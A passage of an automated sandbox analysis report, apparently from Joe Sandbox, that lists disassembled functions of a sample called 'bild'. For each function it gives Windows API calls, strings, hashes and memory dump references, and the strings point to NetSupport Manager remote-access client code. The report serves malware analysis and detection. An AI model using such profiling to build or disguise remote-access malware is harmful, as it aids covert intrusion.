                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AtomGlobal$ErrorExitLastProcesswsprintf$Message_strrchr
                                                                                          • String ID: ..\ctl32\wndclass.cpp$GlobalAddAtom failed, e=%d$NSMDropTarget$NSMReflect$NSMWndClass$m_aProp
                                                                                          • API String ID: 1734919802-1728070458
                                                                                          • Opcode ID: c283eabc343593951191b6a2689ac3898b07c71967e340f2684f7c9ae3ac2948
                                                                                          • Instruction ID: 2151ae3f148807adf1b9b51829e7bc1db46dc9b6ec15270657221fcdabbc1952
                                                                                          • Opcode Fuzzy Hash: c283eabc343593951191b6a2689ac3898b07c71967e340f2684f7c9ae3ac2948
                                                                                          • Instruction Fuzzy Hash: 1B110479A01319ABC720EFE69C84A96F7B4FF2231CB40822EE46543240DA706944CB51
                                                                                          APIs
                                                                                            • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                            • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                            • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                          • std::exception::exception.LIBCMT ref: 1111013A
                                                                                          • __CxxThrowException@8.LIBCMT ref: 1111014F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 11110166
                                                                                          • InitializeCriticalSection.KERNEL32(-00000010,?,11031040,00000001,00000000), ref: 11110179
                                                                                          • InitializeCriticalSection.KERNEL32(111F08F0,?,11031040,00000001,00000000), ref: 11110188
                                                                                          • EnterCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111019C
                                                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031040), ref: 111101C2
                                                                                          • LeaveCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111024F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_malloc_memsetstd::exception::exceptionwsprintf
                                                                                          • String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent
                                                                                          • API String ID: 1976012330-1024648535
                                                                                          • Opcode ID: db19f8e7b9fff8ba68d37a9baa43a0e7c0721c068b2f24d3f0a3aafd2fe6ed90
                                                                                          • Instruction ID: 7e481d80fa827a07ee7257280804c30d2ae959ce5d98406b053f8524d928f6e4
                                                                                          • Opcode Fuzzy Hash: db19f8e7b9fff8ba68d37a9baa43a0e7c0721c068b2f24d3f0a3aafd2fe6ed90
                                                                                          • Instruction Fuzzy Hash: 6C41C2B5E00216AFDB11CFB98C84BAEFBF5FB48708F00453AE815DB244E675A944CB91
                                                                                          APIs
                                                                                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,F3EE1E80,00000000,?), ref: 1115BA67
                                                                                          • CoCreateInstance.OLE32(111C4FEC,00000000,00000017,111C4F1C,?), ref: 1115BA87
                                                                                          • wsprintfW.USER32 ref: 1115BAA7
                                                                                          • SysAllocString.OLEAUT32(?), ref: 1115BAB3
                                                                                          • wsprintfW.USER32 ref: 1115BB67
                                                                                          • SysFreeString.OLEAUT32(?), ref: 1115BC08
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Stringwsprintf$AllocCreateFreeInitializeInstanceSecurity
                                                                                          • String ID: SELECT * FROM %s$WQL$root\CIMV2
                                                                                          • API String ID: 3050498177-823534439
                                                                                          • Opcode ID: 576cfa077ff6f7d7422243c8d6aded75e2d45eb1edbb45dc90fee1c625149e70
                                                                                          • Instruction ID: 667e066b75244b2782fe63ff2368f72f8a2c2363a2cb4bcdb988270c73b3585f
                                                                                          • Opcode Fuzzy Hash: 576cfa077ff6f7d7422243c8d6aded75e2d45eb1edbb45dc90fee1c625149e70
                                                                                          • Instruction Fuzzy Hash: 7351B071B00219ABC764CF69CC84F9AF7B9FB8A714F1042A8E429E7240DA70AE40CF55
                                                                                          APIs
                                                                                          • _calloc.LIBCMT ref: 6C5E2FBB
                                                                                          • GetTickCount.KERNEL32 ref: 6C5E300D
                                                                                          • InterlockedExchange.KERNEL32(?,00000000), ref: 6C5E301B
                                                                                          • _calloc.LIBCMT ref: 6C5E303B
                                                                                          • _memmove.LIBCMT ref: 6C5E3049
                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 6C5E307F
                                                                                          • SetEvent.KERNEL32(00000308,?,?,?,?,?,?,?,?,?,?,?,?,?,?,939E34B3), ref: 6C5E308C
                                                                                            • Part of subcall function 6C5E28D0: wsprintfA.USER32 ref: 6C5E2965
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3900030829.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3900014293.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900075671.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900091633.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900091633.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900123306.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_6c5d0000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Interlocked_calloc$CountDecrementEventExchangeTick_memmovewsprintf
                                                                                          • String ID: a3^l$a3^l
                                                                                          • API String ID: 3178096747-1531287518
                                                                                          • Opcode ID: 3391fb66f8c9279749039ce9bdf7013c98a783aec3d5853591469d329c930f3b
                                                                                          • Instruction ID: b07ff557ca466e130170c4e88f318dbd3eb09bff7e07ea863bff7de938e3be89
                                                                                          • Opcode Fuzzy Hash: 3391fb66f8c9279749039ce9bdf7013c98a783aec3d5853591469d329c930f3b
                                                                                          • Instruction Fuzzy Hash: D34166B5D00209AFDB00DFA9CC45AEFB7B8EB8C305F00851AE515E7640E771AA058BA1
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(IPHLPAPI.DLL,00000000,6C5F0F2B,1038AB42,00000000,?,?,6C60F278,000000FF,?,6C5DAE0A,?,00000000,?,00000080), ref: 6C5F0D48
                                                                                          • GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 6C5F0D5B
                                                                                          • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,?,?,-6C61CB4C,?,?,6C60F278,000000FF,?,6C5DAE0A,?,00000000,?,00000080), ref: 6C5F0D76
                                                                                          • _malloc.LIBCMT ref: 6C5F0D8C
                                                                                            • Part of subcall function 6C5F1B69: __FF_MSGBANNER.LIBCMT ref: 6C5F1B82
                                                                                            • Part of subcall function 6C5F1B69: __NMSG_WRITE.LIBCMT ref: 6C5F1B89
                                                                                            • Part of subcall function 6C5F1B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6C5FD3C1,6C5F6E81,00000001,6C5F6E81,?,6C5FF447,00000018,6C617738,0000000C,6C5FF4D7), ref: 6C5F1BAE
                                                                                          • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,6C60F278,000000FF,?,6C5DAE0A,?,00000000,?), ref: 6C5F0D9F
                                                                                          • _free.LIBCMT ref: 6C5F0D84
                                                                                            • Part of subcall function 6C5F1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 6C5F1C13
                                                                                            • Part of subcall function 6C5F1BFD: GetLastError.KERNEL32(00000000), ref: 6C5F1C25
                                                                                          • _free.LIBCMT ref: 6C5F0DAF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3900030829.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3900014293.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900075671.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900091633.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900091633.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900123306.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_6c5d0000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AdaptersAddressesHeap_free$AddressAllocateErrorFreeLastLibraryLoadProc_malloc
                                                                                          • String ID: GetAdaptersAddresses$IPHLPAPI.DLL
                                                                                          • API String ID: 1360380336-1843585929
                                                                                          • Opcode ID: f2572543428997c8b1390d33c8aef895bc5d5504cf79b18af34aa884e991c258
                                                                                          • Instruction ID: 5f63a6c4c531cfa2697ff8420c0a1c5ae77eb827c9b6ee89afed28c04b5278e4
                                                                                          • Opcode Fuzzy Hash: f2572543428997c8b1390d33c8aef895bc5d5504cf79b18af34aa884e991c258
                                                                                          • Instruction Fuzzy Hash: 0001D4F5200341ABE7289B759C85F5776A89B80B05F24482DF566CBA80EB71F846CB64
                                                                                          APIs
                                                                                            • Part of subcall function 11145330: RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 111453A0
                                                                                            • Part of subcall function 11145330: RegCloseKey.ADVAPI32(?), ref: 11145404
                                                                                          • _memset.LIBCMT ref: 11145485
                                                                                          • GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114549E
                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll), ref: 111454C5
                                                                                          • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111454D7
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 111454EF
                                                                                          • GetSystemDefaultLangID.KERNEL32 ref: 111454FA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Library$AddressCloseDefaultFreeLangLoadOpenProcSystemVersion_memset
                                                                                          • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                                                          • API String ID: 4251163631-545709139
                                                                                          • Opcode ID: 60d783b5b5cd8942fc75307bb254099b366294b2f30fa269448a3e45cf09a56e
                                                                                          • Instruction ID: 76ed8f4553af2ae4cc76032582d3c5cf4b75be54885724a55a46303ac3459834
                                                                                          • Opcode Fuzzy Hash: 60d783b5b5cd8942fc75307bb254099b366294b2f30fa269448a3e45cf09a56e
                                                                                          • Instruction Fuzzy Hash: 07313971E002299BD761DF74D984BE9F7B6EB08729F540164E42DC7A80D7344984CF91
                                                                                          APIs
                                                                                          • wsprintfA.USER32 ref: 110150CA
                                                                                          • _memset.LIBCMT ref: 1101510E
                                                                                          • RegQueryValueExA.KERNEL32(?,PackedCatalogItem,00000000,?,?,?,?,?,00020019), ref: 11015148
                                                                                          Strings
                                                                                          • %012d, xrefs: 110150C4
                                                                                          • PackedCatalogItem, xrefs: 11015132
                                                                                          • NSLSP, xrefs: 11015158
                                                                                          • SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries, xrefs: 1101504B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: QueryValue_memsetwsprintf
                                                                                          • String ID: %012d$NSLSP$PackedCatalogItem$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries
                                                                                          • API String ID: 1333399081-1346142259
                                                                                          • Opcode ID: 51d8f863940591209aa48ee8c17907a3c30549026713edc7384ebfc6867c5eab
                                                                                          • Instruction ID: d38f3a4d66d5a90606c53f5b1b84405609ec5bb3b13ff7cea0d7775b25b40b12
                                                                                          • Opcode Fuzzy Hash: 51d8f863940591209aa48ee8c17907a3c30549026713edc7384ebfc6867c5eab
                                                                                          • Instruction Fuzzy Hash: C6419D71D02269AFEB11DB64CC90BDEF7B8EB44314F0445E9E819A7281EB35AB48CF50
                                                                                          APIs
                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 1100FDED
                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 1100FE10
                                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 1100FE94
                                                                                          • __CxxThrowException@8.LIBCMT ref: 1100FEA2
                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 1100FEB5
                                                                                          • std::locale::facet::_Facet_Register.LIBCPMT ref: 1100FECF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                          • String ID: bad cast
                                                                                          • API String ID: 2427920155-3145022300
                                                                                          • Opcode ID: a7aa4a6049a8ed817bef268ace451c424b01c27ab063a1090bc59c7f390f5fbb
                                                                                          • Instruction ID: 563b417412927bd42dfe2d2268ce551a617b01fe8fe711e168dc892134580a96
                                                                                          • Opcode Fuzzy Hash: a7aa4a6049a8ed817bef268ace451c424b01c27ab063a1090bc59c7f390f5fbb
                                                                                          • Instruction Fuzzy Hash: 5731E975D002669FD711DF94C890BAEF7B8EB04B68F10426DD921A7291DB717D40CB92
                                                                                          APIs
                                                                                          • GetTickCount.KERNEL32 ref: 6C5E6950
                                                                                            • Part of subcall function 6C5E7BE0: _memset.LIBCMT ref: 6C5E7BFF
                                                                                            • Part of subcall function 6C5E7BE0: _strncpy.LIBCMT ref: 6C5E7C0B
                                                                                            • Part of subcall function 6C5DA4E0: EnterCriticalSection.KERNEL32(6C61B898,00000000,?,?,?,6C5DDA7F,?,00000000), ref: 6C5DA503
                                                                                            • Part of subcall function 6C5DA4E0: InterlockedExchange.KERNEL32(?,00000000), ref: 6C5DA568
                                                                                            • Part of subcall function 6C5DA4E0: Sleep.KERNEL32(00000000,?,6C5DDA7F,?,00000000), ref: 6C5DA581
                                                                                            • Part of subcall function 6C5DA4E0: LeaveCriticalSection.KERNEL32(6C61B898,00000000), ref: 6C5DA5B3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3900030829.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3900014293.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900075671.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900091633.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900091633.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900123306.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_6c5d0000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$CountEnterExchangeInterlockedLeaveSleepTick_memset_strncpy
                                                                                          • String ID: 1.2$Bl^l$Channel$Client$Publish %d pending services
                                                                                          • API String ID: 1112461860-3724619051
                                                                                          • Opcode ID: b3781626d08bba0d0c1be4c731d31220b6d7aea3d102f15218fa38e7e9c4e79a
                                                                                          • Instruction ID: d7257693362b3b5800c530b124fa5055513c9b1dcfaaf5649dd297b53f66769a
                                                                                          • Opcode Fuzzy Hash: b3781626d08bba0d0c1be4c731d31220b6d7aea3d102f15218fa38e7e9c4e79a
                                                                                          • Instruction Fuzzy Hash: 3551E671B04309DBDB10EA7EDC9679D37B4AB4938AF14053AC952C3E81DF30A944CB59
                                                                                          APIs
                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,11194AB8), ref: 11144C3D
                                                                                          • SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110F4CB), ref: 11144C7E
                                                                                          • SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 11144CDB
                                                                                            • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                            • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                            • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                            • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FolderPath$ErrorExitFileLastMessageModuleNameProcesswsprintf
                                                                                          • String ID: ..\ctl32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
                                                                                          • API String ID: 3494822531-1878648853
                                                                                          • Opcode ID: 942c5252def4268129969c39a1215845e921a51e2954e507dd92eff7077da9be
                                                                                          • Instruction ID: dd955378f98185685044f21f066d1e50e049b7277ab8e5714ac6db0ba135c9a8
                                                                                          • Opcode Fuzzy Hash: 942c5252def4268129969c39a1215845e921a51e2954e507dd92eff7077da9be
                                                                                          • Instruction Fuzzy Hash: AB518835D4022E5BD711CF24DC50BDEF7A4AF15B08F2401A4D8997BA80EBB27B84CBA5
                                                                                          APIs
                                                                                            • Part of subcall function 1110F520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EDC3F0,?,1111022D,00000000,00000001,?,?,?,?,?,11031040), ref: 1110F53E
                                                                                            • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                            • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                            • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                          • LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11189A56,000000FF), ref: 11107363
                                                                                          • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 111073B2
                                                                                          • std::exception::exception.LIBCMT ref: 11107414
                                                                                          • __CxxThrowException@8.LIBCMT ref: 11107429
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
